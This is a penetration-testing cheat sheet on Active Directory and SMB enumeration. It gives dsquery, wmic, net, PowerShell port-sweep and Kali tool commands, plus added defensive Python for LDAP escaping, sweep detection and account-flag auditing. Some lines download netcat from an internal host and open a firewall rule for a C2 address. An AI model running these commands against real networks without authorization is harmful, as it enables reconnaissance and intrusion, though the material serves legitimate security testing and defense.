Active Directory Enumeration

Enumerating Active Directory can provide valuable information about the network's structure and potential weaknesses during a penetration test.

Active Directory Components

  • Domain Controllers:

    • Holds the AD DS data store

    • Handles authentication and authorization services

    • Replicates updates from other domain controllers in the forest

    • Allows admin access to manage domain resources

  • AD DS Data Store:

    • Contains NTDS.dit, the database that holds all AD DS data, including password hashes for domain users

    • Stored by default in %SystemRoot%\NTDS

    • Accessible only by the domain controller

  • Forest

    • Container that holds pieces of AD network

    • Forest is a collection of one or more domain trees inside

    • Forest consists of:

      • Trees - A hierarchy of domains in Active Directory Domain Services

      • Domains - Used to group and manage objects

      • Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs

      • Trusts - Allows users to access resources in other domains

      • Objects - users, groups, printers, computers, shares

      • Domain Services - DNS Server, LLMNR, IPv6

      • Domain Schema - Rules for object creation

  • Users

    • 4 primary types of user accounts:

      • Domain admins

      • Service accounts

      • Local administrators

      • Domain users

  • Groups

    • Distribution groups: specify email distribution lists

    • Security groups: specify permissions for a large number of users, including the following default security groups:

      • Domain Controllers - All domain controllers in the domain

      • Domain Guests - All domain guests

      • Domain Users - All domain users

      • Domain Computers - All workstations and servers joined to the domain

      • Domain Admins - Designated administrators of the domain

      • Enterprise Admins - Designated administrators of the enterprise

      • Schema Admins - Designated administrators of the schema

      • DNS Admins - DNS Administrators Group

      • DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).

      • Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain

      • Group Policy Creator Owners - Members in this group can modify group policy for the domain

      • Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain

      • Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.

      • Cert Publishers - Members of this group are permitted to publish certificates to the directory

      • Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain

      • Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise

      • Key Admins - Members of this group can perform administrative actions on key objects within the domain.

      • Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.

      • Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.

      • RAS and IAS Servers - Servers in this group can access remote access properties of users

  • Domain Trusts

    • Put rules into place about domain interactions

    • Trusts allow users to gain access to other domain resources

    • Types of trusts:

      • Directional - The direction of the trust flows from a trusting domain to a trusted domain

      • Transitive - The trust relationship expands beyond just two domains to include other trusted domains

  • Domain Policies

    • Like domain groups, except instead of permissions they contain rules

  • Active Directory Domain Services

    • Services that a domain controller provides to the rest of the domain or tree

CMD Tools

Domain User Info with CMD

Enumerating with PowerShell

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

Display DC Address, Domain Name, Roles

wmic ntdomain

Dsquery User List

dsquery user domainroot

User Logon Name from Email

dsquery * domainroot -filter "(&(objectCategory=Person)(objectClass=User)(mail=e-mailaddress))" -attr name
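The mail address in that filter is the one value that comes from outside the query, so it should be escaped before it is spliced in. The following Python helper is an added example, not part of the original cheat sheet or of dsquery: it builds the same filter with the value escaped per RFC 4515, so that input such as "*" or "a)(objectClass=*" stays a literal match instead of rewriting the query (LDAP filter injection). The sample addresses are constructed.

```python
# Added example, not from the original cheat sheet: build the "user logon
# name from e-mail" filter with the address escaped per RFC 4515.
import subprocess

# Characters with special meaning inside an LDAP filter assertion value.
_SPECIAL = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    """Escape an assertion value for an LDAP search filter (RFC 4515).

    Special characters become \\XX; non-ASCII characters are UTF-8 encoded
    and every byte is escaped the same way.
    """
    out = []
    for ch in value:
        if ch in _SPECIAL:
            out.append(_SPECIAL[ch])
        elif ord(ch) > 0x7F:
            out.append("".join(f"\\{b:02x}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


def user_by_mail_filter(mail: str) -> str:
    """The filter from the dsquery one-liner above, with the address escaped."""
    return f"(&(objectCategory=Person)(objectClass=User)(mail={escape_filter_value(mail)}))"


def dsquery_argv(mail: str) -> list:
    """Argument vector for the same dsquery call. Passing a list (no shell)
    keeps the filter one argument regardless of spaces or quotes in it."""
    return ["dsquery", "*", "domainroot", "-filter", user_by_mail_filter(mail), "-attr", "name"]


def lookup_logon_name(mail: str) -> str:
    """Run dsquery (Windows with the AD DS tools installed) and return its output."""
    return subprocess.run(dsquery_argv(mail), capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed inputs: the last two would match every user if left unescaped.
    for sample in ["alice@mydomain.local", "*", "a)(objectClass=*"]:
        print(user_by_mail_filter(sample))
```

Run it on a workstation that has the RSAT AD DS tools to call dsquery through lookup_logon_name; the filter and escaping functions work anywhere.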

Display Trusted Domain

dsquery * -filter "(objectclass=TrustedDomain)" -attr trustpartner,flatname,trustdirection

Domain Admins from Remote Trusted Domain

dsquery * -filter "(cn=Domain Admins)" -attr member -d trustedDomain

Display All Domain Users

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

Display All Domain Groups

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname

Display All Domain Computers

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

View Domain User Info

net user /domain
net user pentestuser /domain

Display Domain Admin Users

net group "Domain Admins" /domain

View All Hosts in Domain/Workgroup

net view

Display Network Shares

net share

Display Domain Trust Info

nltest
nltest /finduser:sweppler
nltest /dclist:mydomain
nltest /trusted_domains

Batch Script (\tools\WinDomainEnum.bat)

@echo off

echo Enumerating Active Directory objects...

dsquery * -filter "(objectCategory=user)" > ad_users.txt
dsquery * -filter "(objectCategory=group)" > ad_groups.txt
dsquery * -filter "(objectCategory=computer)" > ad_computers.txt

echo Active Directory information has been saved to the following files:
echo ad_users.txt
echo ad_groups.txt
echo ad_computers.txt
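The files that script writes contain one quoted distinguished name per line, which is hard to review by eye on a large domain. The Python below is an added example, not part of the batch script or the original page: it splits each DN into its RDNs (honouring backslash-escaped commas as in RFC 4514) and counts objects per parent container, so accounts sitting in unexpected OUs stand out. The sample lines are constructed in the shape dsquery prints, not real output.

```python
# Added example, not from the original page: summarise dsquery's quoted-DN
# output (ad_users.txt and friends) by parent container.
from collections import Counter

# Constructed sample in the form dsquery writes it (not real output).
SAMPLE_USERS = '''"CN=Alice Smith,OU=Sales,DC=mydomain,DC=local"
"CN=Bob Jones,OU=Sales,DC=mydomain,DC=local"
"CN=Smith\\, Carol,OU=Finance,DC=mydomain,DC=local"
"CN=svc-backup,OU=Service Accounts,OU=IT,DC=mydomain,DC=local"
"CN=Administrator,CN=Users,DC=mydomain,DC=local"
'''


def split_dn(dn: str) -> list:
    """Split a DN into (attribute, value) pairs, leaf first.

    A backslash escapes the next character (RFC 4514), so "\\," does not
    end an RDN. Escape sequences are kept verbatim so the pairs can be
    re-joined losslessly.
    """
    rdns, buf, i = [], [], 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):
            buf.append(dn[i:i + 2])
            i += 2
            continue
        if ch == ",":
            rdns.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    rdns.append("".join(buf))
    pairs = []
    for rdn in rdns:
        attr, _, value = rdn.partition("=")
        pairs.append((attr.strip().upper(), value.strip()))
    return pairs


def parent_path(dn: str) -> str:
    """Container of the object, e.g. 'OU=Sales,DC=mydomain,DC=local'."""
    return ",".join(f"{a}={v}" for a, v in split_dn(dn)[1:])


def objects_per_container(dsquery_output: str) -> Counter:
    """Count objects per parent container in dsquery's quoted-DN output."""
    counts = Counter()
    for line in dsquery_output.splitlines():
        line = line.strip()
        if not line:
            continue
        counts[parent_path(line.strip('"'))] += 1
    return counts


if __name__ == "__main__":
    # Replace SAMPLE_USERS with open("ad_users.txt").read() on a real run.
    for container, n in objects_per_container(SAMPLE_USERS).most_common():
        print(f"{n:5d}  {container}")
```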

PowerShell Tools

Ping Sweeper

1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}

Port Sweeper

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<IPADDR>", $_)) "Port $_ is open!"} 2>$null

Sweep Range of IPs for Single Port

foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}

Sweep IPs and Ports

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}

Test Egress Filtering

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("allports.exposed",$_)) "Port $_ is open" } 2>$null
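Seen from the other side, every one of these sweeps leaves a distinctive trace: one source touching many ports on one host, or one port on many hosts, in a short time. The Python below is an added example, not from the original page, showing that detection over Windows Firewall log lines (pfirewall.log in its W3C layout: date time action protocol src-ip dst-ip src-port dst-port ...). The thresholds, the window and the log lines are constructed for the demonstration; tune the thresholds to your own environment's baseline.

```python
# Added example, not from the original page: flag port sweeps and host
# sweeps in Windows Firewall (pfirewall.log) lines.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


class Event(NamedTuple):
    when: datetime
    action: str
    proto: str
    src: str
    dst: str
    dport: int


def parse_firewall_log(text: str) -> list:
    """Parse pfirewall.log lines; '#' header lines and non-TCP/UDP rows are skipped."""
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 8 or f[3] not in ("TCP", "UDP"):
            continue
        when = datetime.strptime(f"{f[0]} {f[1]}", "%Y-%m-%d %H:%M:%S")
        events.append(Event(when, f[2], f[3], f[4], f[5], int(f[7])))
    return events


def _max_distinct_in_window(items, window):
    """items: sorted [(time, key)]; largest number of distinct keys in any window."""
    best, lo, counts = 0, 0, defaultdict(int)
    for t, key in items:
        counts[key] += 1
        while items[lo][0] < t - window:          # drop entries older than the window
            old = items[lo][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best


def find_sweeps(events, window_seconds=60, port_threshold=10, host_threshold=5):
    """Return {src: [finding, ...]} for sources whose traffic looks like a sweep."""
    window = timedelta(seconds=window_seconds)
    per_host = defaultdict(list)   # (src, dst)   -> [(time, dport)]
    per_port = defaultdict(list)   # (src, dport) -> [(time, dst)]
    for e in events:
        per_host[(e.src, e.dst)].append((e.when, e.dport))
        per_port[(e.src, e.dport)].append((e.when, e.dst))
    findings = defaultdict(list)
    for (src, dst), items in per_host.items():
        n = _max_distinct_in_window(sorted(items), window)
        if n >= port_threshold:
            findings[src].append(f"port sweep: {n} distinct ports on {dst} within {window_seconds}s")
    for (src, dport), items in per_port.items():
        n = _max_distinct_in_window(sorted(items), window)
        if n >= host_threshold:
            findings[src].append(f"host sweep: {n} hosts on port {dport} within {window_seconds}s")
    return dict(findings)


def _line(t, src, dst, dport, action="DROP"):
    """One constructed pfirewall.log row (not real data)."""
    return f"2024-05-01 {t} {action} TCP {src} {dst} 51000 {dport} 52 S 1 0 8192 - - - RECEIVE"


SAMPLE_LOG = "\n".join(
    ["#Version: 1.5",
     "#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path"]
    + [_line(f"10:15:{s:02d}", "192.168.1.50", "192.168.1.10", 20 + s) for s in range(12)]     # 12 ports, one host
    + [_line(f"10:20:{s:02d}", "192.168.1.60", f"192.168.1.{100 + s}", 80) for s in range(6)]  # port 80, six hosts
    + [_line("10:30:00", "192.168.1.70", "192.168.1.10", 443, "ALLOW"),                        # ordinary traffic
       _line("10:30:05", "192.168.1.70", "192.168.1.10", 445, "ALLOW")]
)

if __name__ == "__main__":
    # Replace SAMPLE_LOG with open(r"C:\Windows\System32\LogFiles\Firewall\pfirewall.log").read()
    for src, notes in find_sweeps(parse_firewall_log(SAMPLE_LOG)).items():
        print(src, "->", "; ".join(notes))
```

The sliding window matters: a slow sweep spread over hours will not trip a 60-second window, so a real deployment would run the same counting at several window sizes.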

Display Domain Admins

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Display Accounts Whose Password Never Expires (userAccountControl bit 65536, DONT_EXPIRE_PASSWORD)

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
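The number in that filter is a bit in userAccountControl, and 1.2.840.113556.1.4.803 is the LDAP "all bits set" matching rule (its sibling 1.2.840.113556.1.4.804 means "any bit set"). The Python below is an added example, not from the original page: it decodes a userAccountControl value into the documented flag names, rebuilds the same kind of filter for any combination of flags, and reviews a set of accounts for settings that deserve a second look. The sample accounts are constructed; the flag values are Microsoft's documented ones.

```python
# Added example, not from the original page: decode and audit
# userAccountControl, and build the bitwise LDAP filter used above.

UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}

# Settings that weaken password or Kerberos protections; worth reviewing per account.
RISKY = {"PASSWD_NOTREQD", "DONT_EXPIRE_PASSWORD", "DONT_REQ_PREAUTH",
         "TRUSTED_FOR_DELEGATION", "USE_DES_KEY_ONLY", "ENCRYPTED_TEXT_PWD_ALLOWED"}


def decode_uac(value: int) -> list:
    """Flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def uac_filter(*names: str, match_all: bool = True) -> str:
    """LDAP filter selecting users with the given flags (all set, or any set)."""
    rule = "803" if match_all else "804"
    mask = sum(NAME_TO_BIT[n] for n in names)
    return (f"(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:1.2.840.113556.1.4.{rule}:={mask}))")


def audit(accounts: dict) -> dict:
    """Map sAMAccountName -> risky flag names, for accounts that have any."""
    out = {}
    for sam, uac in accounts.items():
        hits = [f for f in decode_uac(uac) if f in RISKY]
        if hits:
            out[sam] = hits
    return out


# Constructed sample: sAMAccountName -> userAccountControl (not real accounts).
SAMPLE_ACCOUNTS = {
    "alice": 512,                          # NORMAL_ACCOUNT
    "svc-backup": 512 | 0x10000,           # password never expires
    "legacy-app": 512 | 0x20 | 0x400000,   # no password required, no pre-auth
    "disabled-old": 514,                   # NORMAL_ACCOUNT + ACCOUNTDISABLE
}

if __name__ == "__main__":
    print(uac_filter("DONT_EXPIRE_PASSWORD"))          # the filter from the cheat sheet
    print(uac_filter("PASSWD_NOTREQD", "DONT_REQ_PREAUTH", match_all=False))
    for sam, flags in audit(SAMPLE_ACCOUNTS).items():
        print(f"{sam}: {', '.join(flags)}")
```

To review a real domain, feed audit() the sAMAccountName and userAccountControl columns from a dsquery -attr samaccountname,useraccountcontrol run or from Get-ADUser -Properties userAccountControl.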

Web Client to Download Files (e.g. Netcat)

wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"

Get Firewall Rules

Get-NetFirewallRule -All | Out-GridView
Get-NetFirewallRule -All | Export-Csv <file_path.csv>

Add Firewall Rule

New-NetFirewallRule -Action Allow -DisplayName Pentester-C2 -RemoteAddress <IPADDR>

Generate CSV with User Info

Import-Module ActiveDirectory

# -SearchBase takes a distinguished name; an "LDAP://" prefix makes Get-ADObject fail
# -Filter * returns every object under the base (users, groups, computers, OUs, ...)
Get-ADObject -Filter * -SearchBase "DC=mydomain,DC=local" |
    Select-Object Name, ObjectClass, DistinguishedName |
    Export-Csv -Path "C:\ADObjects.csv" -NoTypeInformation

Linux/Kali Tools

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Discover Windows / Samba servers on a subnet: finds Windows MAC addresses and NetBIOS names, and discovers the client workgroup / domain

nbtscan 192.168.1.0/24

Do everything: runs all enum4linux options (including finding the Windows client domain / workgroup) apart from dictionary-based share name guessing

enum4linux -a target-ip

Fingerprint SMB Version

smbclient -L //192.168.1.100 

Find open SMB Shares in Nmap

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   

Enumerate SMB Users in Nmap

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 

Enumerate SMB Using Samrdump Python Impacket

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX


RID Cycling with ridenum (https://github.com/trustedsec/ridenum)

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit RID Cycling

use auxiliary/scanner/smb/smb_lookupsid

Resources

https://www.hackingarticles.in/impacket-guide-smb-msrpc/

https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

"C:\Code\Penetration-Testing - Working\tools\WindowsEnum.ps1"

"C:\Code\Penetration-Testing - Working\tools\WinUserEnum.bat"
